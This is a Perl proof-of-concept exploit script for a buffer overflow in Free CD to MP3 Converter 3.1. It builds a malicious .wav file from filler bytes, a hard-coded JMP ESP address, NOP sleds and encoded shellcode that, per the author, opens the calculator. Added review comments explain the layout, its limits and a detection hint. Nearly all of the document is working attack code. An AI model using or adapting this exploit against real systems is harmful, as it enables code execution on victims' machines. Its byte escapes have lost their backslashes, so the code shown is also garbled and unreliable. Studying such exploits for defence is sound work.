# Title : Free CD to MP3 Converter 3.1 Buffer Overflow Exploit
# Published : 2010-11-10
# Author : C4SS!0 G0M3S
#!usr/bin/perl
#Exploit Title: Exploit 0day Buffer Overflow Free CD to MP3 Converter 3.1
#Date: 09112010
#Author: C4SS!0 G0M3S
#Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe
#Version: 3.1
#Tested on: WIN-XP SP3
#
#
#Exploit Written by C4SS!0 G0M3S
#
#
#Home: http://www.invasao.com.br
#
#
#E-mail: louredo_@hotmail.com
#
#
use IO::File;#import IO:File
# Console cosmetics only: both commands are fixed strings handed to the
# Windows command interpreter ("cls" clears the screen, "color 4f" switches
# the console to bright white text on a red background). No command-line
# argument reaches either call.
system("cls");
system("color 4f");
# Prints the ASCII-art banner, then the author credits and the command-line
# help. The main script body calls this when it is not given exactly one
# argument.
sub usage
{
# Banner printer. Named subs are package-scoped in Perl even when they are
# written inside another sub, so image() is also callable from the main
# script body.
# NOTE(review): the bare "n" runs at the ends of the strings below look like
# "\n" escapes whose backslash was lost when this page was extracted; as
# rendered they print a literal letter n rather than a newline.
sub image
{
print("nn");
print(" ______________n");
print(" <C4SS!0 G0MES>n".
" --------------n".
" \ ,__,n".
" \-- (oo)____n".
" (__) )\n".
" ||--|| nnnn");
}
# Show the banner first, then the credits and usage text.
image;
print(" [+]Exploit: Buffer Overflow Free CD to MP3 Converternn".
" [+]Author: C4SS!0 G0M3Snn".
" [+]Home: http://www.invasao.com.brnn".
" [+]E-mail: Louredo_@hotmail.comnnn".
" [+]Usage: exploit.pl <File to create>n".
" [+]Exemple: exploit.pl music.wavn");
}
# Main flow: with anything other than exactly one argument, print the help;
# otherwise write the crafted file named by that argument.
if($#ARGV != 0)
{
usage;
}
else
{
image;
# Layout of the generated file, in write order (see the print to f below):
# filler | 4-byte address | NOP run | payload | NOP run.
# NOTE(review): every "xNN" group on this page looks like a "\xNN" byte
# escape that lost its backslash in extraction, so as rendered these strings
# are plain text and their lengths are not the ones the author intended.
# For defenders: the usage text suggests a .wav name, so a sample that lacks
# a RIFF header and instead opens with a long run of one repeated byte is a
# cheap triage signal -- confirm against a real sample before relying on it.
$buffer="x41" x 4112;
# pack('V', ...) emits the value as 4 little-endian bytes, written directly
# after the filler. Per the author's trailing note it is the address of a
# JMP ESP instruction inside cdextact.exe.
# NOTE(review): a hard-coded address inside the program's own image only
# holds if that image loads at a fixed base, and jumping to the stack only
# works if the stack is executable; ASLR-enabled builds and enforced DEP
# presumably defeat this layout -- the header lists WIN-XP SP3 as the only
# tested platform.
$eip=pack('V',0x004D97BB);#Jmp Esp From(cdextact.exe)
# Author's note: the payload below starts the Windows calculator as a
# proof-of-concept marker. The bytes are not decoded or verified here.
#Exec the Calc
$shellcode="xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";
# Padding placed on both sides of the payload in the output.
$nops="x90" x 50;
# NOTE(review): these status lines, including "Created Successfully", are
# printed before the file is even opened, so they say nothing about whether
# the write worked.
print(" [+]Writing in the Shellcode @ARGV[0] Filenn".
" [+]Identifying the Length of the Shellcodenn".
" [+]Length of the Shellcode:".length($shellcode)."nn".
" [+]File @ARGV[0] Created Successfullynn");
# NOTE(review): two-argument open with a bareword handle and no error check;
# the command-line argument is interpolated straight into the mode string.
# Three-argument open with a lexical handle and "or die" is the safe form.
open(f,">@ARGV[0]");
print f $buffer.$eip.$nops.$shellcode.$nops;
# close() with no handle closes the currently selected handle (STDOUT by
# default), not f; f is only flushed and closed when the script exits.
close();
}